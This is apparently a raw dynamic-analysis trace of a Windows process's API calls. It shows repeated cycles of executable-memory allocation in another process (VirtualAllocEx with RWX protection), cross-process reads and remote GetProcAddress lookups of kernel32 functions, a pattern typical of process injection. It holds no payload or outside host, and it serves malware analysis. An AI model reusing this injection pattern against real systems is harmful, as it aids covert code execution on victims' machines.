	[0197.910] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.910] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.910] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.910] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.910] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.910] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.911] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.911] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.911] lstrlenA (lpString="LCMapStringW") returned 12
	[0197.911] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.912] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.912] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.912] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.912] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.912] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.912] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.913] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.913] lstrlenA (lpString="GetLocaleInfoW") returned 14
	[0197.913] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.913] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.913] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.913] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.914] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.914] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.914] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.914] lstrlenA (lpString="InitializeCriticalSectionAndSpinCount") returned 37
	[0197.914] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.915] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.915] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.915] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.915] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.915] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.916] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.916] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.916] lstrlenA (lpString="TlsAlloc") returned 8
	[0197.916] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.916] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.917] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.917] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.917] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.917] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.917] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.917] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.917] lstrlenA (lpString="TlsGetValue") returned 11
	[0197.917] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.918] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.918] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.918] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.918] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.918] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.919] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.919] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.919] lstrlenA (lpString="TlsSetValue") returned 11
	[0197.919] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.920] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.920] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.920] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.920] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.920] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.920] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.920] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.921] lstrlenA (lpString="TlsFree") returned 7
	[0197.921] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.921] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.922] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.922] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.922] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.922] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.922] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.922] lstrlenA (lpString="GetStringTypeW") returned 14
	[0197.922] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.923] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.923] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.923] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.923] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.923] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.924] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.924] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.924] lstrlenA (lpString="GlobalAlloc") returned 11
	[0197.924] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.925] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.925] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.925] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.925] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.925] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.925] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.926] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.926] lstrlenA (lpString="GlobalFree") returned 10
	[0197.926] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.926] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.926] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.926] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.927] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.927] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.927] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.927] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.927] lstrlenA (lpString="FindFirstFileA") returned 14
	[0197.927] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.928] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.928] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.928] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.928] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.928] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.928] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.929] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.929] lstrlenA (lpString="FindNextFileA") returned 13
	[0197.929] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.929] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.929] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.930] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.930] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.930] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.930] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.930] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.930] lstrlenA (lpString="CopyFileA") returned 9
	[0197.930] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.931] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.931] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.931] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.931] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.932] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.932] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.932] lstrlenA (lpString="GetFileTime") returned 11
	[0197.932] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.932] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.933] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.933] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.933] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.933] lstrlenA (lpString="InterlockedFlushSList") returned 21
	[0197.933] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.934] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.934] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.935] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.935] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.935] lstrlenA (lpString="LoadLibraryExW") returned 14
	[0197.935] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.935] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.936] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.936] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.936] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.936] lstrlenA (lpString="RaiseException") returned 14
	[0197.936] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.937] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.937] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.937] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.938] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.938] lstrlenA (lpString="RtlUnwind") returned 9
	[0197.938] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.938] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.938] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.939] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.939] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.939] lstrlenA (lpString="ExitThread") returned 10
	[0197.939] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.940] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.940] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.940] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.940] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.940] lstrlenA (lpString="FreeLibraryAndExitThread") returned 24
	[0197.940] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.941] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.941] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.942] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.942] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.942] lstrlenA (lpString="GetModuleHandleExW") returned 18
	[0197.942] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.943] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.943] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.943] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.943] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.943] lstrlenA (lpString="ExitProcess") returned 11
	[0197.943] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.944] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.944] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.945] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.945] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.945] lstrlenA (lpString="GetModuleFileNameA") returned 18
	[0197.945] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.945] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.946] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.946] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.946] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.946] lstrlenA (lpString="GetStdHandle") returned 12
	[0197.946] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.947] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.947] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.947] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.948] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.948] lstrlenA (lpString="GetFileType") returned 11
	[0197.948] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.948] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.948] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.949] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.949] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.949] lstrlenA (lpString="GetConsoleCP") returned 12
	[0197.949] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.950] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.950] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.950] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.950] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.950] lstrlenA (lpString="GetConsoleMode") returned 14
	[0197.950] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.951] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.951] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.952] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.952] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.952] lstrlenA (lpString="IsValidLocale") returned 13
	[0197.952] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.952] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.953] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.954] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.954] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.954] lstrlenA (lpString="GetUserDefaultLCID") returned 18
	[0197.954] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.955] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.955] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.955] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.956] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.956] lstrlenA (lpString="EnumSystemLocalesW") returned 18
	[0197.956] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
